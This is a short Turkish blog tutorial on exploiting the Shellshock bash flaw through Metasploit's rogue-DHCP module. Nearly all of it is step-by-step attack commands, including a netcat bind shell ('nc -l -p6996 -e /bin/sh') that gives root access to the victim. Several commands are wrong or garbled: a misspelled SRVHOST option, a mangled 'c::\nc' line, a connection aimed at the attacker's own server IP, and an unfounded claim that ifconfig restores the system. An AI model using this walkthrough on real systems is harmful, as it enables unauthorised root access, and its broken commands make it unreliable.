Register Now

Login

Lost Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Login

Register Now

Canyoupwn.me ~

TR | Metasploit Framework Yardımı ile Shellshock Zafiyetinden Yararlanma

Shellshock Nedir?

Linux sistemlerde bash kabuğunda fark edilen güvenlik açığıdır.

Nasıl Kullanılır?

  • Metasploit Framework ü çalıştıyoruz;
msfconsole
  • Exploit i arıyoruz;
search shellshock
  • Exploit i yüklüyoruz.
use auxiliary/server/dhclient/dhclient_bash_env
  • Exploit için gerekli paremetlereler “CMD” , “SRVHOST” VE “NETMASK”. Bunları eğer görüntülemek istersek;
info
  • Seçenekleri görüntüleyip parametreleri düzenleme aşamasına geçersek;
show options
  • DHPC sunucu ip adresini değişmek için;
set SVRHOST 192.168.131.61
  • CMD parametresini düzenlemek için;
set CMD /bin/nc -l -p6996 -e /bin/sh
  • Son parametremiz NETMASK için;
set NETMASK 255.255.255.0
  • Exploiti çalıştrmak için;
exploit
  • Çalıştırdıktan sonra durumu özet geçmek gerekirse hedefin CMD satırında Shellshock zafiyeti sayesinde root yetkisiyle “6996” nolu portla netcat yardımıyla bağlantı kurabiliriz. Exploitli sisteme bağlanmak için;
c::\nc 192.168.131.61 6996
  • Exploited Linux sistemin ayarlarına döndürmek için;
ifconfig

yapmamız yeterlidir.

  • Sistemdeki yetkimizi check etmek için;
whoami

yapıp root olup olmadığımızı doğrulayabiliriz.

About Mustafa Kaan Demirhan

Security Researcher

Follow Me